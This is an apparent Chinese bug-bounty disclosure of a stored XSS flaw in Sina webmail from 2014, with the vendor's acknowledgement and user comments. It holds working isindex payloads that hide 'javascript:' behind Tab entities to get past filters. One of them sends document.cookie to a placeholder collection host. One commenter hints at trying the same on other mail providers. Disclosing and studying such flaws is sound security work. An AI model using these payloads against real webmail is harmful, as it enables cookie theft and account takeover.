新浪邮箱邮件正文存储型XSS漏洞

注：需要在webkit内核浏览器下触发。以下提交通过自写脚本提交，通过web邮箱的html编辑提交存在问题（126测试不行）

提交：

<isindex prompt="This is a test:   " action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>

提交：

<isindex prompt="This is a test:   " action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(document.cookie) type=image>

触屏版邮箱：

cookie窃取，如提交：

<isindex prompt="This is a test:" action="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:(new Image()).src='http://xxxx/get_cookie.php?cookie_store='+encodeURIComponent(document.cookie)" type=image>

获取：

过滤

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2014-08-29 21:46

厂商回复：

感谢关注新浪安全，漏洞修复中。

最新状态：

暂无

1. 2014-08-29 11:26 | 进击的zjx ( 普通白帽子 | Rank:1712 漏洞数:59 )

   0

   第一次前排

   1# 回复此人

2. 2014-08-29 11:43 | diguoji ( 普通白帽子 | Rank:485 漏洞数:120 | 中国吉林长春,高考230分,现在家里务农。)

   0

   江山辈有才人出，楼上楼下小心被X

   2# 回复此人

3. 2014-08-29 11:44 | Non-polar ( 实习白帽子 | Rank:37 漏洞数:18 | 只要还有明天，今天就永远是起跑线 ҉̵̶...)

   0

   前排围观

   3# 回复此人

4. 2014-08-29 13:03 | 只发通用型 ( 实习白帽子 | Rank:93 漏洞数:14 | 刷通用型奖金小号)

   0

   假如用其他邮箱收信 会被X吗

   4# 回复此人

5. 2014-09-19 08:14 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:37 )

   0

   正在默默，偷偷插139，网易

   5# 回复此人

6. 2014-09-19 08:18 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:37 )

   0

   使用&编码来绕过过滤。思路学习了

   6# 回复此人

7. 2014-09-29 07:49 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

   0

   。。。&换行，，，这也行！

   7# 回复此人